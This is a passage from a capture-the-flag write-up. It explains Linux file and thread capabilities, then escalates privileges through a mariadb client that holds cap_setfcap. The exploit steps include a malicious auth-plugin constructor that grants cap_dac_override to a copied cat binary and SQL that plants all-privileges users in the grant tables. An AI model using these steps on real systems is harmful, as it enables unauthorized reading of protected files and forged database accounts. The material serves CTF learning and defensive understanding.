Connection received on 116.62.19.175 26740
pwd
/mysql/data
 
We have shell!

Exploring the system

Alright, we're in. Now what?

The contest organizers gave a hint saying to run getcap, so that seems like a good place to start:

getcap -r / 2> /dev/null
/usr/bin/mariadb cap_setfcap+ep

Well that is something. Apparently the MariaDB command line client (not the server) has the setfcap capability set.

What are capabilities anyhow?

While I have certainly heard of Linux capabilities before, I must admit I wasn't very familiar with them. So what are they?

Capabilities are basically a fine-grained version of "root". Each process (thread technically) has a certain set of capabilities, which grant it rights it wouldn't normally otherwise have.

For example, if you are running a web server that needs to listen on port 80, instead of giving it full root rights, you could give the process the CAP_NET_BIND_SERVICE capability, which allows it to bind to port 80 even if it is not root. Traditionally you need root to bind to any port below 1024.

There are a variety of capabilities that divide up the traditional things that root gives you, e.g. CAP_CHOWN to change file owners or CAP_KILL to send signals, and so on.

Sounds simple enough, but the rules on how capabilities are transferred between processes are actually quite complex. Personally I found most of the docs online a bit confusing, so here is my attempt at explaining:
 
Essentially, each running thread has 5 sets of capabilities, and each executable program has 2 sets + 1 special bit in the filesystem. What capabilities a new process will actually have and which ones are turned on is the result of the interplay between all these different sets.

The different capabilities associated with a thread are as follows (You can view the values for a specific running process in /proc/XXX/status):
  • Effective: These are the capabilities that are actually currently used for the thread when doing permission checks. You can think of these as the capabilities that are currently "on".
  • Permitted: These are the capabilities that the thread can give itself. In essence, these are the capabilities that the thread can turn on, but may or may not currently be "on" (effective). If a capability is in this set but not the effective set, it won't be used for permission checks at present but a thread is capable of enabling it for permission checks later on with cap_set_proc().
  • Inheritable: These are the capabilities that can potentially be inherited by new processes after doing execve. However the new process will only get these capabilities if the file being executed has also been marked as inheriting the same capability.
  • Ambient: This is like a super-version of inheritable. These capabilities will always be given to child processes after execve even if the program is not explicitly marked as being able to inherit them. It will inherit them into both its effective set and its permitted set, so they become "on" by default.
  • Bounding: This is more like a max limit. Anything not in this list can never be given out or gained. In a normal system, you probably have all capabilities in this set, but if you wanted to set up a restricted system some capabilities might be removed from here to ensure it is impossible to ever gain them back.
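To make the /proc/XXX/status part concrete: the status file reports these five sets as hexadecimal bitmasks on lines named CapInh, CapPrm, CapEff, CapBnd and CapAmb, with bit N standing for capability number N. Below is a minimal sketch of decoding one of those lines. The helper names and the CAP_NUM_* constants are hypothetical, chosen so they don't clash with the real macros in <linux/capability.h>; the numeric values match that header.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Capability numbers as defined in <linux/capability.h>
 * (hypothetical names to avoid clashing with the real macros). */
enum {
    CAP_NUM_CHOWN = 0,
    CAP_NUM_DAC_OVERRIDE = 1,
    CAP_NUM_KILL = 5,
    CAP_NUM_NET_BIND_SERVICE = 10,
    CAP_NUM_SETFCAP = 31
};

/* If line looks like "<field>:\t<hex mask>", store the mask and return 1.
 * Returns 0 if the line is for a different field or has no hex digits. */
int parse_cap_line(const char *line, const char *field, uint64_t *mask) {
    assert(line != NULL && field != NULL && mask != NULL);
    size_t n = strlen(field);
    if (strncmp(line, field, n) != 0 || line[n] != ':') return 0;
    const char *start = line + n + 1;
    char *end;
    unsigned long long v = strtoull(start, &end, 16);
    if (end == start) return 0;
    *mask = (uint64_t)v;
    return 1;
}

/* Is capability number cap set in this mask? */
int mask_has_cap(uint64_t mask, int cap) {
    return (int)((mask >> cap) & 1u);
}

/* Read one set (e.g. "CapEff") from a status file such as
 * /proc/self/status. Returns 1 if the field was found. */
int read_cap_set(const char *status_path, const char *field, uint64_t *mask) {
    FILE *f = fopen(status_path, "r");
    if (f == NULL) return 0;
    char line[256];
    int found = 0;
    while (!found && fgets(line, sizeof line, f) != NULL)
        found = parse_cap_line(line, field, mask);
    fclose(f);
    return found;
}
```

For example, calling read_cap_set("/proc/self/status", "CapEff", &mask) and then mask_has_cap(mask, CAP_NUM_SETFCAP) tells you whether the current process has CAP_SETFCAP switched on.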
In addition to threads having capabilities, executable files on the file system also can have capabilities. This is somewhat akin to how SUID works (although unlike SUID this is not marked in the output of ls in any way). Files have 2 sets of capabilities and 1 special flag. These can be viewed using getcap:
  • Permitted: These are the capabilities that the executable will get when being executed. The process will get all of these capabilities (except those missing from the bounding set) even if the parent process does not have these capabilities. It's important to remember that the file permitted set is a different concept from the permitted set of a running process.
  • Inheritable: These are the capabilities the executable will get if the running parent process also has them in its inheritable set.
  • Effective flag: This is just a flag not a set of capabilities. This controls how the new process will gain capabilities. If it is off, then the new capabilities will go in the thread's permitted set and won't automatically be enabled until the thread itself enables them by adding to its own effective set. If this flag is on, then the new capabilities for the thread go in the thread's effective set automatically (i.e. they start in an "on" state).
Generally capabilities for files are displayed as capability_name=eip where e, i and p, denote what file set the capability is in (e is a flag so has to be on for all or none of the capabilities).
 
To summarize file system capabilities: "permitted" are the capabilities the process automatically gets when started regardless of parent process, "inherited" are the ones that they can potentially gain from the parent process but generally won't get if the parent process doesn't have them as inheritable, and effective controls if the capabilities are on by default or if the process has to make a syscall before they become turned on.

This is a bit complex, so let's consider an example:

Consider an executable file named foo that has cap_chown in its (filesystem) inherited set and cap_kill in its (filesystem) permitted set.
 
 sudo setcap cap_chown=+i\ cap_kill=+p ./foo
 
This means when we execute it, the foo process will definitely have cap_kill in its permitted set regardless of the parent (as long as it is in the bounding set of the parent process). It might have cap_chown in its permitted set, but only if the parent process had cap_chown in its inheritable set. However, its effective set will be empty (assuming no ambient capabilities are in play) until foo calls cap_set_proc(). If instead the e flag was set, then these capabilities would immediately be in the effective set without having to call cap_set_proc(). Regardless, if the foo process execve's some other child process where the file being executed is not marked as having any capabilities, the child would not inherit any of the capabilities foo has.
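The rules behind this example can be written down as a small model. The sketch below implements the transformation formulas from the capabilities(7) man page as plain bitmask arithmetic. It is only a model: it ignores the special cases for root and set-user-ID programs, and the type and function names are hypothetical. check_foo_example() replays the foo scenario using the sets from the setcap command above (cap_chown in the file inheritable set, cap_kill in the file permitted set).

```c
#include <assert.h>
#include <stdint.h>

typedef uint64_t capset;                 /* one bit per capability number */
#define CAP_BIT(n) ((capset)1 << (n))

/* The five per-thread sets and the two per-file sets plus the e flag. */
struct thread_caps { capset permitted, inheritable, effective, bounding, ambient; };
struct file_caps   { capset permitted, inheritable; int effective; };

/* Capabilities of the thread after execve() of a file, following the
 * formulas in capabilities(7). Root and SUID special cases are ignored. */
struct thread_caps caps_after_execve(struct thread_caps p, struct file_caps f) {
    struct thread_caps n;
    /* A file with any capabilities attached drops the ambient set. */
    int file_is_privileged = (f.permitted | f.inheritable) != 0;

    n.ambient     = file_is_privileged ? 0 : p.ambient;
    n.permitted   = (p.inheritable & f.inheritable)
                  | (f.permitted & p.bounding)
                  | n.ambient;
    n.effective   = f.effective ? n.permitted : n.ambient;
    n.inheritable = p.inheritable;
    n.bounding    = p.bounding;
    return n;
}

/* Usage: the foo example, with cap_chown = 0 and cap_kill = 5. */
void check_foo_example(void) {
    struct file_caps foo = { CAP_BIT(5), CAP_BIT(0), 0 };
    struct thread_caps parent = { 0, 0, 0, ~(capset)0, 0 };

    /* Parent has nothing inheritable: only the file permitted cap arrives. */
    struct thread_caps t = caps_after_execve(parent, foo);
    assert(t.permitted == CAP_BIT(5));
    assert(t.effective == 0);            /* e flag is off */

    /* Parent with cap_chown inheritable: foo gains it as well. */
    parent.inheritable = CAP_BIT(0);
    t = caps_after_execve(parent, foo);
    assert(t.permitted == (CAP_BIT(5) | CAP_BIT(0)));

    /* foo then runs a plain binary without file capabilities. */
    parent.inheritable = 0;
    t = caps_after_execve(parent, foo);
    struct file_caps plain = { 0, 0, 0 };
    struct thread_caps child = caps_after_execve(t, plain);
    assert(child.permitted == 0 && child.effective == 0);
}
```

Setting foo.effective to 1 in the model makes the effective set equal the permitted set right after execve, which is the "on by default" behaviour of the e flag.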


I've simplified this somewhat; see the capabilities(7) man page for the full details.

MariaDB's capabilities

With that in mind, let's get back to the problem at hand.

/usr/bin/mariadb cap_setfcap+ep

So MariaDB client has the setfcap capability. It is marked effective and permitted, which means the process will always get it and have it turned on by default when executed.

What is cap_setfcap? According to the manual, it allows the process to "Set arbitrary capabilities on a file."

Alright, that sounds useful. We want to read /flag despite not having permission to, so we can get mariadb with its CAP_SETFCAP capability to give another executable CAP_DAC_OVERRIDE capability. CAP_DAC_OVERRIDE means ignore file permissions, which would allow us to read any file.

My initial thought was to use the \! operator in the mariadb client, which lets you run shell commands, to run setcap(8). However it quickly became obvious that this wouldn't work. Since these permissions are only in the permitted & effective sets, they are not going to be inherited by the shell. Even if they were in the inheritable set, the shell would also have to have its executable marked as inheriting them in order for them to get inherited. Thus any subshell we make is unprivileged.

We need mariadb to execute our commands inside its process without running execve. The moment we execve we lose these capabilities.

Luckily, we can basically use the same trick as last time. In addition to mariadbd server supporting plugins, mariadb client also supports plugins. These are used for supporting custom authentication methods.
 
In MariaDB users can be authenticated via plugins. These server side authentication plugins can also have a client side requirement. If you try and log in as a user marked as using one of these plugins, the MariaDB client will automatically try and load (dlopen()) the relevant plugin when you try and log in as that user.

I again modified an existing one instead of trying to make my own. I decided to go with the dialog_example plugin from the MariaDB source code.

The server side part of this is from plugin/auth_examples/dialog_examples.c. The only change I made was to switch mysql_declare_plugin(dialog) to maria_declare_plugin(dialog) and set the stability to MariaDB_PLUGIN_MATURITY_STABLE (previously was 0). This was needed for mariadb to load the plugin in the default configuration. For clarity's sake, although the name of the file is dialog_examples, the plugin's actual name is "two_questions".
 
After compiling, this generated a dialog_examples.so file which I uploaded to the server in the same fashion as before.

The client side part of the plugin is from libmariadb/plugins/auth/dialog.c. I added the following code:

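#include <stdio.h>
#include <sys/capability.h>

#define handle_error(msg) \
   do { perror(msg); } while (0)

/* Runs as soon as the mariadb client dlopen()s this plugin. */
__attribute__((constructor))
void foo(void) {
        /* Build the capability set we want to attach to the file. */
        cap_t cap = cap_from_text( "cap_dac_override=epi" );
        if (cap == NULL) {
                handle_error( "cap_from_text" );
                return;
        }
        /* Needs CAP_SETFCAP, which the mariadb client process has. */
        int res = cap_set_file( "/mysql/priv", cap );
        if (res != 0 ) handle_error( "cap_set_file" );
        cap_free( cap );
}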


I also modified libmariadb/plugins/auth/CMakeLists.txt to add LIBRARIES cap to the REGISTER_PLUGIN directive to ensure it is linked with libcap.

This code essentially says: when the plugin is loaded, change the file capabilities of /mysql/priv to be cap_dac_override=epi (the i is probably unnecessary), thus allowing that program to read all files.

Compiling this made libmariadb/dialog.so which I uploaded to the server in the usual fashion. I also ran cp /bin/cat /mysql/priv to create the target for our plugin's capability modifications.

Setting things up to run the plugin

Now that these pieces are in place, we still have to convince the mariadb client to run our plugin. This comes down to trying to log in to a mariadb server that needs the dialog/two_questions authentication method.
 
Normally this would be pretty easy: just run CREATE USER. However, that uses the grant tables, which are explicitly disabled.
 
At first I thought I was going to need to somehow get rid of this option on the server (or I suppose just use a server on a different host. I didn't think of that at the time, but it probably would have been simpler). However, it turns out that even if the server starts without the grant tables enabled, you can enable them after the fact by running FLUSH PRIVILEGES.

Of course, these tables don't even exist, and the normal methods of adding entries (CREATE USER command) won't work until they do. Thus we have to manually create the table ourselves and make appropriate entries.
 
I log in using the mariadb command line client from the shell, as this is a lot easier than the sql-injection, and run the following commands to set this all up:
 
$ mariadb -u root -h 127.0.0.1 -p123456 -n

use mysql;
source /usr/share/mysql/mysql_system_tables.sql; -- install defaults for mysql db

INSTALL PLUGIN two_questions SONAME "dialog_examples.so";

INSERT INTO `global_priv` VALUES ('%','foo','{\"access\":1073741823,\"version_id\":100521,\"plugin\":\"two_questions\",\"authentication_string\":\"*00A51F3F48415C7D4E8908980D443C29C69B60C9\",\"password_last_changed\":1698000149}' );

INSERT INTO `global_priv` VALUES ('%','root','{\"access\":1073741823,\"version_id\":100521,\"plugin\":\"mysql_native_password\",\"authentication_string\":\"*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9\",\"password_last_changed\":1698000149}' );

FLUSH PRIVILEGES;

 
In summary: I use the -n option to ensure mariadb flushes its output after each query. Since we don't have a pseudo-terminal, output would show up way too late if we didn't do this.

I switch to the special mysql database which we created earlier. I already created the plugin table, but now I use SOURCE to create the other defaults for the mysql database. The mysql_system_tables.sql file was already present on the server. Then we insert a root user so we don't lose access, along with a foo user that uses our plugin.

Once we run FLUSH PRIVILEGES the new permissions take effect.

We now exit this and try logging in as foo, being sure to specify the appropriate plugin directory:
 
mysql -u foo -h 127.0.0.1 -n --plugin-dir=./plugin

The login doesn't work, but the plugin seems to have been executed. We had previously copied cat to /mysql/priv. If everything worked right, it should now be able to read any file on the system regardless of permissions:

/mysql/priv /flag
n1ctf{9a81f84cc7a3064e34800c35}


Success!

Conclusion

This was a fun problem. It taught me some of the internals of MariaDB and was a good excuse to finally commit the time to understanding how Linux capabilities actually work.

The biggest challenge was figuring out that the mysql.plugin table was needed to load a plugin. It probably would have been a lot less frustrating of a problem if error messages from stacked queries were actually output.

Nobody solved this problem until fairly late in the competition, but then about 8 teams did. The CTF organizers did release a hint that capabilities were involved. I wonder if many teams just didn't think to check for that, as giving mariadb random capabilities it can't even use is not something that is likely to happen in real life, and capabilities are much less famous than SUID binaries.

Perhaps teams didn't get that far and simply saw from the output of the "secret" website command that some sort of unknown privilege escalation was necessary, figured it might be some really involved thing, and decided to work on other problems instead. In a way I'm kind of surprised that getcap wasn't output from the secret command to give people more of a direct hint; other more obvious things were, after all. For that matter, it is kind of weird how ls doesn't mark files with capabilities in any special way like it does for a SUID binary. I know it's not stored in the traditional file mode, but nonetheless I found it a little surprising how hidden from traditional cli tools it is that capabilities are in play.